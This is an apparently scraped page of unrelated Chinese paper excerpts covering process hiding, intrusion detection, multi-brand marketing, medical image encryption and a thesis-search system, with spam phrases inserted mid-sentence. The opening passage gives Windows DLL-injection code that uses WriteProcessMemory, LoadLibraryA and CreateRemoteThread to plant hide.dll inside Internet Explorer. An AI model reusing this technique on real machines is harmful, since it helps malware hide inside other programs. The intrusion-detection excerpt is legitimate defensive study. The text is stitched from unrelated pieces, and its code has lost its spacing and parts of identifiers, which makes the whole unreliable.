BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名寫入申請的空間

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//獲取動態(tài)鏈接庫函數(shù)地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//創(chuàng)建遠(yuǎn)程線

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//關(guān)閉遠(yuǎn)程線程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//關(guān)閉進程快照

}

該程序編譯后命名為RmtDll.exe,運行時點擊界面上的按鈕即可。

至此，遠(yuǎn)程嵌入順利完成，為了試驗我們的hide.dll是不是已經(jīng)正常地在遠(yuǎn)程線程運行，我同樣在C++Builder4.0環(huán)境下編寫并編譯了下面的hide.dll作為測試：

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//獲取當(dāng)前進程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

當(dāng)使用RmtDll.exe程序?qū)⑦@個hide.dll嵌入IEXPLORE.EXE進程后假設(shè)PID=1208），該測試DLL彈出了1208字樣的確認(rèn)框，同時使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

這證明hide.dll已經(jīng)在IEXPLORE.EXE進程內(nèi)正確地運行了。上面程序的頭文件由編譯器自動生成，未作改動，故略之。

5結(jié)束語

進程隱藏技術(shù)和方法有很多，而且這一技術(shù)發(fā)展也相當(dāng)快，本文僅從一個側(cè)面加以討論，希望通過這一探討讓我們對進程隱藏技術(shù)有一個更清楚的認(rèn)識，同時也為我們防范他人利用進程隱藏手段非法入侵提供參考，本文拋磚引玉，不當(dāng)之處誠懇批評指正。

篇（7）

 

信息網(wǎng)絡(luò)和安全體系是信息化健康發(fā)展的基礎(chǔ)和保障。但是,隨著信息化應(yīng)用的深入、認(rèn)識的提高和技術(shù)的發(fā)展,現(xiàn)有信息網(wǎng)絡(luò)系統(tǒng)的安全性建設(shè)已提上工作日程。

入侵攻擊有關(guān)方法,主要有完成攻擊前的信息收集、完成主要的權(quán)限提升完成主要的后門留置等,下面僅就包括筆者根據(jù)近年來在網(wǎng)絡(luò)管理中有關(guān)知識和經(jīng)驗,就入侵攻擊的對策及檢測情況做一闡述。論文大全。

對入侵攻擊來說,掃描是信息收集的主要手段,所以通過對各種掃描原理進行分析后,我們可以找到在攻擊發(fā)生時數(shù)據(jù)流所具有的特征。

1、利用數(shù)據(jù)流特征來檢測攻擊的思路

掃描時,攻擊者首先需要自己構(gòu)造用來掃描的IP數(shù)據(jù)包,通過發(fā)送正常的和不正常的數(shù)據(jù)包達(dá)到計算機端口,再等待端口對其響應(yīng),通過響應(yīng)的結(jié)果作為鑒別。我們要做的是讓IDS系統(tǒng)能夠比較準(zhǔn)確地檢測到系統(tǒng)遭受了網(wǎng)絡(luò)掃描?？紤]下面幾種思路:

(1)特征匹配

找到掃描攻擊時數(shù)據(jù)包中含有的數(shù)據(jù)特征,可以通過分析網(wǎng)絡(luò)信息包中是否含有端口掃描特征的數(shù)據(jù),來檢測端口掃描的存在。如UDP端口掃描嘗試:content:“sUDP”等。

(2)統(tǒng)計分析

預(yù)先定義一個時間段,在這個時間段內(nèi)如發(fā)現(xiàn)了超過某一預(yù)定值的連接次數(shù),認(rèn)為是端口掃描。

(3)系統(tǒng)分析

若攻擊者對同一主機使用緩慢的分布式掃描方法,間隔時間足夠讓入侵檢測系統(tǒng)忽略,不按順序掃描整個網(wǎng)段,將探測步驟分散在幾個會話中,不導(dǎo)致系統(tǒng)或網(wǎng)絡(luò)出現(xiàn)明顯異常,不導(dǎo)致日志系統(tǒng)快速增加記錄,那么這種掃描將是比較隱秘的。這樣的話,通過上面的簡單的統(tǒng)計分析方法不能檢測到它們的存在,但是從理論上來說,掃描是無法絕對隱秘的,若能對收集到的長期數(shù)據(jù)進行系統(tǒng)分析,可以檢測出緩慢和分布式的掃描。

2、檢測本地權(quán)限攻擊的思路

行為監(jiān)測法、文件完備性檢查、系統(tǒng)快照對比檢查是常用的檢測技術(shù)。虛擬機技術(shù)是下一步我們要研究的重點方向。

(1)行為監(jiān)測法

由于溢出程序有些行為在正常程序中比較罕見,因此可以根據(jù)溢出程序的共同行為制定規(guī)則條件,如果符合現(xiàn)有的條件規(guī)則就認(rèn)為是溢出程序。行為監(jiān)測法可以檢測未知溢出程序,但實現(xiàn)起來有一定難度,不容易考慮周全。行為監(jiān)測法從以下方面進行有效地監(jiān)測:一是監(jiān)控內(nèi)存活動,跟蹤內(nèi)存容量的異常變化,對中斷向量進行監(jiān)控、檢測。二是跟蹤程序進程的堆棧變化,維護程序運行期的堆棧合法性。以防御本地溢出攻擊和競爭條件攻擊。

監(jiān)測敏感目錄和敏感類型的文件。對來自www服務(wù)的腳本執(zhí)行目錄、ftp服務(wù)目錄等敏感目錄的可執(zhí)行文件的運行,進行攔截、仲裁。對這些目錄的文件寫入操作進行審計,阻止非法程序的上傳和寫入。監(jiān)測來自系統(tǒng)服務(wù)程序的命令的執(zhí)行。對數(shù)據(jù)庫服務(wù)程序的有關(guān)接口進行控制,防止通過系統(tǒng)服務(wù)程序進行的權(quán)限提升。論文大全。監(jiān)測注冊表的訪問,采用特征碼檢測的方法,阻止木馬和攻擊程序的運行。

(2)文件完備性檢查

對系統(tǒng)文件和常用庫文件做定期的完備性檢查。可以采用checksum的方式,對重要文件做先驗快照,檢測對這些文件的訪問,對這些文件的完備性作檢查,結(jié)合行為檢測的方法,防止文件覆蓋攻擊和欺騙攻擊。

(3)系統(tǒng)快照對比檢查

對系統(tǒng)中的公共信息,如系統(tǒng)的配置參數(shù),環(huán)境變量做先驗快照,檢測對這些系統(tǒng)變量的訪問,防止篡改導(dǎo)向攻擊。

(4)虛擬機技術(shù)

通過構(gòu)造虛擬x86計算機的寄存器表、指令對照表和虛擬內(nèi)存,能夠讓具有溢出敏感特征的程序在虛擬機中運行一段時間。論文大全。這一過程可以提取與有可能被懷疑是溢出程序或與溢出程序相似的行為,比如可疑的跳轉(zhuǎn)等和正常計算機程序不一樣的地方,再結(jié)合特征碼掃描法,將已知溢出程序代碼特征庫的先驗知識應(yīng)用到虛擬機的運行結(jié)果中,完成對一個特定攻擊行為的判定。

虛擬機技術(shù)仍然與傳統(tǒng)技術(shù)相結(jié)合,并沒有拋棄已知的特征知識庫。虛擬機的引入使得防御軟件從單純的靜態(tài)分析進入了動態(tài)和靜態(tài)分析相結(jié)合的境界,在一個階段里面,極大地提高了已知攻擊和未知攻擊的檢測水平,以相對比較少的代價獲得了可觀的突破。在今后相當(dāng)長的一段時間內(nèi),虛擬機在合理的完整性、技術(shù)技巧等方面都會有相當(dāng)?shù)倪M展。目前國際上公認(rèn)的、并已經(jīng)實現(xiàn)的虛擬機技術(shù)在未知攻擊的判定上可達(dá)到80%左右的準(zhǔn)確率。

3、后門留置檢測的常用技術(shù)

(1)對比檢測法

檢測后門時,重要的是要檢測木馬的可疑蹤跡和異常行為。因為木馬程序在目標(biāo)網(wǎng)絡(luò)的主機上駐留時,為了不被用戶輕易發(fā)現(xiàn),往往會采取各種各樣的隱藏措施,因此檢測木馬程序時必須考慮到木馬可能采取的隱藏技術(shù)并進行有效地規(guī)避,才能發(fā)現(xiàn)木馬引起的異?，F(xiàn)象從而使隱身的木馬“現(xiàn)形”。常用的檢測木馬可疑蹤跡和異常行為的方法包括對比檢測法、文件防篡改法、系統(tǒng)資源監(jiān)測法和協(xié)議分析法等。

(2)文件防篡改法

文件防篡改法是指用戶在打開新文件前,首先對該文件的身份信息進行檢驗以確保沒有被第三方修改。文件的身份信息是用于惟一標(biāo)識文件的指紋信息,可以采用數(shù)字簽名或者md5檢驗和的方式進行生成。

(3)系統(tǒng)資源監(jiān)測法

系統(tǒng)資源監(jiān)測法是指采用監(jiān)控主機系統(tǒng)資源的方式來檢測木馬程序異常行為的技術(shù)。由于黑客需要利用木馬程序進行信息搜集,以及滲透攻擊,木馬程序必然會使用主機的一部分資源,因此通過對主機資源(例如網(wǎng)絡(luò)、CPU、內(nèi)存、磁盤、USB存儲設(shè)備和注冊表等資源)進行監(jiān)控將能夠發(fā)現(xiàn)和攔截可疑的木馬行為。

(4)協(xié)議分析法

協(xié)議分析法是指參照某種標(biāo)準(zhǔn)的網(wǎng)絡(luò)協(xié)議對所監(jiān)聽的網(wǎng)絡(luò)會話進行對比分析,從而判斷該網(wǎng)絡(luò)會話是否為非法木馬會話的技術(shù)。利用協(xié)議分析法能夠檢測出采取了端口復(fù)用技術(shù)進行端口隱藏的木馬。

參考文獻(xiàn):

[1]張普兵,郭廣猛,廖成君.Internet中的電子欺騙攻擊及其防范[J].計算機應(yīng)用,2001,21(1):32-34.

[2]蘇一丹,李桂.基于DFA的大規(guī)模入侵建模方法研究[J].計算機工程與應(yīng)用,2003,39(28).

篇（8）

二、多品牌策略的優(yōu)點

多品牌策略在實踐中屢見不鮮，多品牌策略的優(yōu)點很多，主要有：

（一）多品牌具有較強的靈活性。沒有一種產(chǎn)品是十全十美的，也沒有一個市場是無懈可擊的。浩瀚的市場海洋，為企業(yè)提供了許多平等競爭的機會，關(guān)鍵在于企業(yè)能否及時抓住機遇，在市場上搶占一席之地。見縫插針就是多品牌靈活性的一種具體表現(xiàn)。

（二）多品牌能充分適應(yīng)市場的差異性。消費者的需求是千差萬別的、復(fù)雜多樣的，不同的地區(qū)有不同的風(fēng)俗習(xí)慣；不同的時間有不同的審美觀念；不同的人有不同的愛好追求，等等。

（三）多品牌有利于提高產(chǎn)品的市場占有率。多品牌策略最大的優(yōu)勢便是通過給每一品牌進行準(zhǔn)確定位，從而有效地占領(lǐng)各個細(xì)分市場。如果企業(yè)原先單一目標(biāo)顧客范圍較窄，難以滿足擴大市場份額的需要，此時可以考慮推出不同檔次的品牌，采取不同的價格水平，形成不同的品牌形象，以抓住不同偏好的消費者。

多品牌策略不僅僅是企業(yè)滿足消費需求的被動選擇，也是企業(yè)制定競爭戰(zhàn)略的主動選擇。對市場攻擊者和挑戰(zhàn)者而言，其搶占市場的一個慣用伎倆就是發(fā)展出一個專門針對某一細(xì)分市場的品牌來逐漸蠶食；對市場領(lǐng)導(dǎo)者而言，與其坐等對手來占據(jù)某一細(xì)分市場，不如自己先發(fā)展出一個品牌去搶占，實施有效防御，從而鎖定不同目標(biāo)消費群。

三、多品牌策略的不足

當(dāng)然，每個策略都不是完美的，多品牌策略也存在著缺陷，企業(yè)若在同一市場中發(fā)展多個品牌，成本成長的速度會比收入還快，在零售商與內(nèi)部資源分配上，也會遇上復(fù)雜的管理難題。在推出一項品牌之前，企業(yè)通常會比較它們預(yù)期會產(chǎn)生的額外收入以及行銷該品牌的成本。這類成本通常超乎主管的想像，因為“多品牌”策略有一項嚴(yán)重的限制；它會因不具規(guī)模經(jīng)濟而受害。一家公司會因在一個市場中推出數(shù)個品牌，而招致隱藏的成本，而且在事情發(fā)展超過某一點之后，就會有綁手綁腳之苦。

盡管隱藏成本的累積速度相當(dāng)緩慢，但如果公司將太多品牌塞入這個產(chǎn)品類別，隱藏的成本就出現(xiàn)了。隱藏成本有四種可能呈現(xiàn)方式：

（一）成本重疊。當(dāng)企業(yè)無法透過獨一無二的方式為每一個品牌進行定位時，成本就會攀升。通常，品牌會在特色、屬性或價格方面出現(xiàn)重疊，只是企業(yè)主管未意識到罷了。這些品牌彼此競爭的程度，和它們與對手品牌之間的競爭程度不相上下，而且最后通常演變?yōu)楸舜嘶ハ嗤淌?。如此一來，公司成本的上升速度會比收入成長速度還快。

（二）效率不彰。很多公司已經(jīng)運用自己的品牌開創(chuàng)出幾項顯然有利可圖、但規(guī)模很小的利基。缺乏數(shù)量上的優(yōu)勢并未讓他們的行銷人員擔(dān)心，因為他們力圖達(dá)成的是整個品牌組合的銷售最大化，而不是個別品牌的銷售最大化。但是，這類的公司遲遲才了解，維持一大群品牌（而且每項品牌的運營規(guī)模都相對較?。┑某杀荆鄬Χ?，比推銷幾項大品牌的成本要高。例如，要制造各式各樣的產(chǎn)品，工產(chǎn)方面需要大量的裝備成本以及較長的機器停工時間，從而會導(dǎo)致較高的生產(chǎn)成本。

（三）零售商利潤高昂。當(dāng)企業(yè)推出多項品牌時，要為這些品牌取得零售上架空間，上架成本會高得讓你不得不打退堂鼓。大型零售廠商，如美國的沃爾瑪百貨與歐洲的家樂福，一般在每項產(chǎn)品分類中只將前兩大或前十大品牌上架。零售商運用領(lǐng)導(dǎo)品牌吸引顧客上門，但隨后就向購物者推銷自有品牌。

（四）管理難度加大?！岸嗥放啤辈呗孕枰M行協(xié)調(diào)，包括從產(chǎn)品創(chuàng)新與包裝改變，到經(jīng)銷商關(guān)系與零售商促銷的。大型的品牌組合也需要經(jīng)常進行價格變動與庫存調(diào)整，這些工作會消耗所費不貲的管理資源。

此外，品牌擴增為企業(yè)帶來最大成本的時候，不是現(xiàn)在，而是在未來。那些在市場中具有大型品牌組合的公司，經(jīng)理人不斷掛念在心的，往往是品牌之間的經(jīng)費配置，而不是公司前途或有關(guān)競爭對手的問題。這類沖突的陰影常使企業(yè)組織揮之不去，讓他們在面臨更加專注的對手競爭時，顯得脆弱不堪。

四、多品牌策略的應(yīng)用

（一）明確品牌定位。定位意味著犧牲，意味著有所不為，而企業(yè)的擴張又希望無所不為。企業(yè)在完成資本積累開始對外擴張的過程中，若堅持統(tǒng)一品牌策略，讓所有開發(fā)的新產(chǎn)品都套用原品牌，就會面臨兩難選擇：若進行品牌延伸，盡管極為謹(jǐn)慎行事，采取了防范措施，但也可能出現(xiàn)品牌形象淡化、每一種產(chǎn)品都缺乏個性而被對手各個擊破的風(fēng)險；若放棄某些領(lǐng)域的品牌延伸，則意味著必須放棄一部分市場。要解決這一難題，一個可行的辦法就是要采取產(chǎn)品定位的多品牌策略。

（二）建立內(nèi)在相關(guān)性。品牌管理涉及到采購、生產(chǎn)、營銷、財務(wù)、人力等各個環(huán)節(jié)。對多品牌企業(yè)而言，不能只關(guān)注單個品牌，而必須注意同一系列品牌之間的相互關(guān)聯(lián)和影響。內(nèi)在相關(guān)性主要是指，在實施多品牌策略時必須能夠在幾個品牌之間形成良好的資源整合和共享機制。任何一個企業(yè)的資源和精力都是有限的，因此為了充分利用企業(yè)的內(nèi)外資源，可以成立完善的研發(fā)、采購公共平臺，同時在渠道資源方面也實現(xiàn)良好的品牌互動和共享，并以完全不同的渠道策略來實現(xiàn)品牌間的良性競爭。品牌之間的高效整合與共享是歐萊雅取得成功的關(guān)鍵，其主要體現(xiàn)在技術(shù)和渠道這兩個兼容性極強的方面。在技術(shù)方面，歐萊雅盡量發(fā)揮技術(shù)平臺的相關(guān)效應(yīng)。

（三）發(fā)揮企業(yè)品牌對多品牌策略的杠桿作用。多品牌策略中，品牌關(guān)系的管理還包括企業(yè)品牌和產(chǎn)品品牌之間關(guān)系的管理。企業(yè)品牌用于維護企業(yè)整體形象，對現(xiàn)有和潛在的員工來說，它是一種激勵；對投資者而言，它意味著信心；對于產(chǎn)品品牌，它提供的是承諾。企業(yè)品牌代表的是企業(yè)的外部形象，對產(chǎn)品品牌有很強的杠桿作用。歐萊雅深知企業(yè)品牌的重要性，將其營銷推廣跨越個別產(chǎn)品線的產(chǎn)品品牌宣傳，將光芒聚焦到企業(yè)品牌上來，最終形成一股激化不同產(chǎn)品品牌的能量。

綜上所述，企業(yè)要使用多品牌策略進行市場競爭，需要注意多方面的內(nèi)容。首先在品牌定位時要注意各品牌之間的關(guān)系，使各個品牌互相不沖突，并且協(xié)調(diào)各個品牌之間的內(nèi)在關(guān)系，找出重點培育的品牌，以重點品牌促進其他品牌的發(fā)展，同時又需要防止那些做得不成功的品牌影響重點品牌的價值。在培育各個品牌的同時注意隱藏成本的增加，盡量減少隱藏成本，避免因為隱藏成本拖垮了各個品牌的擴張，做到了這些才能使企業(yè)的多個品牌健康地發(fā)展，使企業(yè)在競爭中獲勝。

論文關(guān)鍵詞：多品牌；品牌定位；品牌關(guān)系

論文提要單一品牌已越來越難以滿足消費者的需求，實施多品牌策略成為眾多企業(yè)競爭市場的手段。本文分析多品牌策略的概念、優(yōu)點和缺點、使用范圍、實踐應(yīng)用，希望對企業(yè)的品牌決策提供幫助。

主要參考文獻(xiàn)：

篇（9）

基本思想是通過混沌系統(tǒng)運算出一個混沌序列，將這個序列按照事先選取的既定的算法或是排列方案進而進一步進行運算以生成新的一個序列。與此同時，為了保證原混沌序列的位置與計算后的新序列之間的變換位置是一一對應(yīng)的，又進一步利用了混沌系統(tǒng)的遍歷性。實驗表明，這種通過由混沌系統(tǒng)得出的混沌序列的進而對其進一步運算得到的變化關(guān)系在應(yīng)用到圖像置亂后可以實現(xiàn)明顯的圖像置亂效果。同時為了改變加密圖像的統(tǒng)計特性、圖像像素值以及降低圖像像素值間的相關(guān)性，也可以通過單個混沌序列或多個復(fù)合的混沌序列來實現(xiàn)改變。數(shù)字圖像信息隱藏數(shù)字圖像信息隱藏技術(shù)也可用于保護病人醫(yī)學(xué)影像的隱私。基本思想是，將需要被加密的醫(yī)學(xué)圖像的數(shù)字信息隱藏在另外一幅無關(guān)的圖像中，比如一幅公開圖像。這幅圖像要求具有一定的迷惑性、大眾性，以便迷惑攻擊者，能夠降低轉(zhuǎn)移其注意力，這樣就降低了圖像被攻擊的幾率；與此同時，通過一定算法改變加密圖像的原有的統(tǒng)計特性。以達(dá)到保護被加密影像的目的。應(yīng)用其中的調(diào)配融合算法、“中國拼圖”算法可以使圖像的信息隱藏達(dá)到一個高質(zhì)量的水平。另外，還可以綜合各種不同的算法的特點，將數(shù)字隱藏技術(shù)擴展到聲音、圖像等不同的信息載體中的信息隱藏需求中去。另外，近年來新興的一種數(shù)字作品版權(quán)保護技術(shù)——數(shù)字圖像水印技術(shù)[3]，能夠有效地保護作者以及出版商的合法權(quán)益不受侵犯，現(xiàn)已被廣泛應(yīng)用于印刷領(lǐng)域中，具有了廣闊的使用價值和商用價值，成為多媒體及知識產(chǎn)權(quán)保護的有效手段之一。數(shù)字圖像水印技術(shù)是信息隱藏技術(shù)研究領(lǐng)域的一個重要分支。為了顯示創(chuàng)作者對其作品的所有權(quán)，這種隱藏技術(shù)將具有某種意義的數(shù)字水印利用數(shù)字嵌入方法將其隱藏在其作品（可以是多種信息載體，比如視頻、圖像、聲音、文字等數(shù)字產(chǎn)品）中。在進行印刷品真?zhèn)悟炞C時，可通過水印的檢測、分析來保證數(shù)字信息的完整性及可靠性。數(shù)字圖像分存數(shù)字圖像分存技術(shù)是把一幅需要進行保護的數(shù)字圖像分割成多幅圖像進行傳輸。被分割后的圖像不再具有某種特殊的意義成為無意義或是看起來雜亂無章的圖像。也可將分割后圖像進一步隱藏到另外幾幅不相關(guān)的或是具有一定迷惑作用的圖像中進行存儲獲傳輸。這類似于數(shù)據(jù)組的分包傳輸。這樣可以避免因個別圖像的傳輸丟失而造成病人隱私信息遭到泄露的危險，而且也起到在通信中個別被分割后的圖像信息的丟失與泄露不會影響原始圖像信息的泄露。數(shù)字圖像分存技術(shù)的特點使竊密者竊取完整的原始圖像的成本大大增加，而且也提高了病人圖像隱私的保密程度同時，若將圖像置亂技術(shù)、圖像隱藏技術(shù)、圖像分存技術(shù)三者結(jié)合起來將使圖像的安全傳輸有了較高的可靠性。

對病人實行連續(xù)診斷，及時獲取病情發(fā)展?fàn)顩r成為未來要實現(xiàn)的目標(biāo)；同時，病人的隱私在圖像傳輸過程中也增加了泄露和被攻擊的風(fēng)險，因此，在某種特定情況下對病人圖像信息的傳輸需要進行加密保護。實現(xiàn)這一目標(biāo)的關(guān)鍵技術(shù)就是安全性高、保密性強、延時短的圖像加密通信系統(tǒng)。圖像加密通信系統(tǒng)對病人的病情進行實時監(jiān)護，并將病人的信息實時傳回到醫(yī)生的監(jiān)控中心，使醫(yī)生能夠通過監(jiān)控屏幕實時查看了解病人的具體情況，以能夠及時做出正確的醫(yī)療診斷。目前數(shù)字圖像的特點決定了其在存儲傳輸時必定要占用較大的空間與帶寬，再加上其需要處理的信息量大，這就進一步給圖像的加密和通信帶來了困難。而遠(yuǎn)程醫(yī)療更需要清楚的觀測到病人的詳細(xì)病情，就進一步加大了保密通信的難度。因此需要將圖像壓縮以及圖像加密兩個技術(shù)結(jié)合起來對數(shù)字圖像的傳輸進行處理。圖像加密是為了保證數(shù)字圖像的安全，圖像的壓縮技術(shù)可以最大限度的減小占用的存儲空間以便降低傳輸數(shù)據(jù)量。根據(jù)對原始圖像進行壓縮及加密處理過程不同，可將現(xiàn)有的數(shù)字圖像加密通信分為三類。圖像直接加密將數(shù)字圖像直接加密一般是通過數(shù)字圖像置亂技術(shù)直接對需要加密的數(shù)字圖像進行置亂，隨后再進行壓縮編碼和通信傳輸。這個方面的研究較早，相關(guān)論文也最多。例如，基于混沌的數(shù)據(jù)塊加密算法將圖像或視頻數(shù)據(jù)先進行位置置亂，再進行像素值擴散，此算法具有較高的密鑰敏感性和明文敏感性，使得加密后的數(shù)據(jù)具有均勻隨機分布的特點。但是，這類方案只看重了圖像的加密，沒有將圖像的壓縮編碼問題放在同樣重要的位置上考慮。這樣就隨之而然的出現(xiàn)了兩個嚴(yán)重影響通信效率及解密后的圖像清晰度的問題。一是，需要加密的原始視頻圖像本身的數(shù)據(jù)占用空間就大，其進一步的加密計算便會消耗大量的資源與時間，這與實時性的要求有悖，況且目前的設(shè)備處理能力有限更難以達(dá)到圖像傳輸?shù)膶崟r性要求，加重了通信的負(fù)擔(dān)；二是，由于經(jīng)過加密算法處理，使圖像原來的相鄰像素間的相關(guān)性有了變化，大量的增加了高頻分量。使加密壓縮后的視頻圖像的高頻分量比低頻分量的失真大得多，因此解密后的圖像會有較大的失真。

首先通過現(xiàn)有的壓縮算法對視頻、圖像進行壓縮，之后再對壓縮后的數(shù)據(jù)加密。加密的算法可更具需要采用安全性不同的算法。此方案的優(yōu)點是具有較高的安全性；缺點是由于加密是在壓縮后的數(shù)字圖像數(shù)據(jù)上進行，便不再區(qū)分?jǐn)?shù)據(jù)的重要性，因此數(shù)據(jù)加密的效果差、效率低而且數(shù)據(jù)也量大，使運算的設(shè)備負(fù)擔(dān)也加重。選擇性加選擇性加密是在方案特點的基礎(chǔ)上改進，在選擇采用一定的壓縮標(biāo)準(zhǔn)將視頻圖像壓縮后，再對重要的數(shù)據(jù)進行著重加密。兼顧了數(shù)據(jù)的安全與傳輸?shù)男?。目前，視頻圖像編碼標(biāo)準(zhǔn)根據(jù)靜態(tài)圖像和動態(tài)圖像來分主要分為靜態(tài)圖像的壓縮標(biāo)準(zhǔn)和運動圖像的壓縮標(biāo)準(zhǔn)兩種。動態(tài)圖像的壓縮標(biāo)準(zhǔn)主要有MPEG-1，MPEG-2，MPEG-4，H.263和H.264；靜態(tài)圖像的壓縮標(biāo)準(zhǔn)主要有JPEG、JPEG2000。文獻(xiàn)[4]采用小波置亂的方法來實現(xiàn)對JPEG2000的小波系數(shù)的實時加密。針對MPEG-2標(biāo)準(zhǔn)，文獻(xiàn)[5]提出了對I幀加密的思路。針對H.264具有代表性的研究成果有Ahn提出的幀內(nèi)預(yù)測模式加擾方法，該方法將所有I、P幀中的INTRA-4x4塊和INTR_16×16塊預(yù)測模式使用定長偽隨機序列進行隨機加擾，方法效率高但安全性較差。文獻(xiàn)[6]提出了對熵編碼過程進行加密的思路，但這種方案的實現(xiàn)比較復(fù)雜。

作者：李穎姝 李瑩 單位：青島市第五人民醫(yī)院 青島市電子政務(wù)與信息資源管理辦公室

篇（10）

中圖分類號：TP392:J642.477文獻(xiàn)標(biāo)識碼：A 文章編號：1009-3044(2007)17-31327-02

Design and Implementation of Thesis Searching System Based on B/S structure

LIU Qun-Yan,ZHANG Da-Wei

(Library Xi'an Polytechnic University ,Xi'an 710048,China)

Abstract:Based on the B/S structure, a thesis searching system is designed and developed for academic thesis searching by the ASP technique and SQL database. The system can run very stably, has complete functions and satisfies all requirements of thesis search excellently, which provides a good platform for sufficient using of academic thesis.

Key words:thesis search; ASP technology; SQL SERVER; B/S structure

1 前言

學(xué)位論文是高等院校或科研機構(gòu)的學(xué)生為獲得某一級別的學(xué)位而向?qū)W?；蚱渌鼘W(xué)術(shù)單位提交的學(xué)術(shù)研究論文，是圍繞某一學(xué)科的重點或前沿課題進行的創(chuàng)造性研究和探討并加以總結(jié)的產(chǎn)物，所以它是具有較高學(xué)術(shù)價值的科技文獻(xiàn)。但很多高校多年來的博士和碩士論文因查詢不便而不能為教學(xué)和科研充分利用，所以建立基于網(wǎng)絡(luò)的、不受時間和空間約束的論文檢索系統(tǒng)已成為提高高校學(xué)位論文利用率的關(guān)鍵。而購買商業(yè)公司開發(fā)的檢索系統(tǒng)雖然其功能齊全、性能穩(wěn)定，但不僅代價昂貴，而且其過于廣泛，不適合某一高校的學(xué)科特點和該校圖書館的具體情況。所以開發(fā)高校學(xué)位論文檢索系統(tǒng)非常必要，而且具有實際應(yīng)用意義。本文討論了該系統(tǒng)的開發(fā)過程和核心難點技術(shù)。

2 系統(tǒng)技術(shù)分析及開發(fā)環(huán)境

本系統(tǒng)采用三層B/S體系結(jié)構(gòu)為其基本框架，運用當(dāng)前應(yīng)用廣泛的動態(tài)web技術(shù)ASP實現(xiàn)其與數(shù)據(jù)庫的強大操作和遠(yuǎn)程客戶端的交流。下面對這些技術(shù)和開發(fā)環(huán)境進行分析介紹。

2.1 B/S結(jié)構(gòu)

B/S（Browser/Server）結(jié)構(gòu)即瀏覽器/服務(wù)器結(jié)構(gòu)，是把web 技術(shù)和數(shù)據(jù)庫技術(shù)結(jié)合起來的技術(shù)，其實現(xiàn)了開發(fā)環(huán)境和應(yīng)用環(huán)境的分離，即用戶端利用相對統(tǒng)一的瀏覽器( IE、Netscape 等) 代替客戶端軟件，實現(xiàn)跨平臺的應(yīng)用服務(wù)，B/S通常采用三層分布式體系結(jié)構(gòu)，如圖1所示。

圖1 B/S結(jié)構(gòu)

三層B/S結(jié)構(gòu)的工作方式主要是用戶通過瀏覽器表單形式把客戶請求以HTTP 協(xié)議方式發(fā)送到web服務(wù)器，web服務(wù)器向數(shù)據(jù)庫服務(wù)器發(fā)送數(shù)據(jù)請求，數(shù)據(jù)庫服務(wù)器經(jīng)過數(shù)據(jù)處理后將符合條件的數(shù)據(jù)返回到web服務(wù)器，web服務(wù)器把結(jié)果翻譯成HTML模式或各類Script 格式, 返回瀏覽器供用戶閱讀。

本系統(tǒng)采用三層B/S體系結(jié)構(gòu)，用戶只要能連接到Internet網(wǎng)絡(luò)，就能很方便的在任何時間任何地點查詢學(xué)位論文。

2.2 ASP技術(shù)

ASP(Active Server Page) 是Microsoft 提出的基于服務(wù)器端的腳本執(zhí)行環(huán)境，通過在普通HTML頁面中嵌入的ASP腳本語言（VBScript 、Jscript），就可以建立和執(zhí)行動態(tài)的、交互的、高性能的Web應(yīng)用程序。由于ASP腳本是在服務(wù)器端解釋執(zhí)行的，所以用其設(shè)計的程序獨立于客戶端瀏覽器且保密性較高；ASP采用ADO技術(shù)訪問數(shù)據(jù)庫，ADO是一組優(yōu)化的訪問數(shù)據(jù)庫專用對象集，提供了完整的站點數(shù)據(jù)庫訪問方案，使ASP訪問數(shù)據(jù)庫十分方便。基于以上原因，本系統(tǒng)采用ASP技術(shù)來實現(xiàn)其功能。

2.3 系統(tǒng)開發(fā)平臺和環(huán)境

本系統(tǒng)服務(wù)器端采用高性能、高可靠性和高安全性的Microsoft Windows 2003 Server為其操作系統(tǒng)，并配置IIS6.0；選取可擴充的、高效的關(guān)系型數(shù)據(jù)庫管理系統(tǒng)SQL SERVER 2000為后臺數(shù)據(jù)庫；采用專業(yè)網(wǎng)站開發(fā)編輯器Macromedia Dreamweaver MX 2004為系統(tǒng)開發(fā)工具；開發(fā)語言為HTML和VBScript；客戶端只需要安裝 IE4.0 或Netscape3.0 以上版本的瀏覽器即可使用本系統(tǒng)。

3 系統(tǒng)的總體結(jié)構(gòu)設(shè)計

在開發(fā)此系統(tǒng)之前，作者做了大量的需求分析，充分了解掌握了系統(tǒng)所必需具有的功能，并考慮了人機功效方面的問題進行系統(tǒng)設(shè)計。下面對該系統(tǒng)的功能模塊、web頁面、數(shù)據(jù)庫作總體的設(shè)計。

3.1 功能模塊分析與設(shè)計

根據(jù)用戶對論文檢索精度要求的不同，該系統(tǒng)主要分為兩大模塊，（1）基本檢索模塊，（2）高級檢索模塊，如圖2所示。

圖2 系統(tǒng)工作流程圖

基本檢索模塊：主要適用于對檢索精確度要求不高、對論文庫按某一條件字段進行簡單分類檢索的用戶。該模塊的功能要求主要有：用戶選擇某一檢索項并輸入檢索詞，就可檢索到符合該條件的所有記錄，并將檢索結(jié)果分頁顯示；可以瀏覽某一紀(jì)錄的詳細(xì)內(nèi)容，包括摘要。

高級檢索模塊：該模塊適用于對檢索結(jié)果要求精確、多條件查詢的用戶。該模塊的功能要求主要有：可以實現(xiàn)多個條件的與、或、非復(fù)雜查詢；將檢索結(jié)果分頁顯示；可瀏覽某一紀(jì)錄的詳細(xì)信息，包括摘要。

根據(jù)學(xué)位論文的特點和用戶的檢索需求，其檢索選擇項分為七類：論文題名、論文作者、論文導(dǎo)師、關(guān)鍵詞、學(xué)科專業(yè)，中文摘要、分類號。

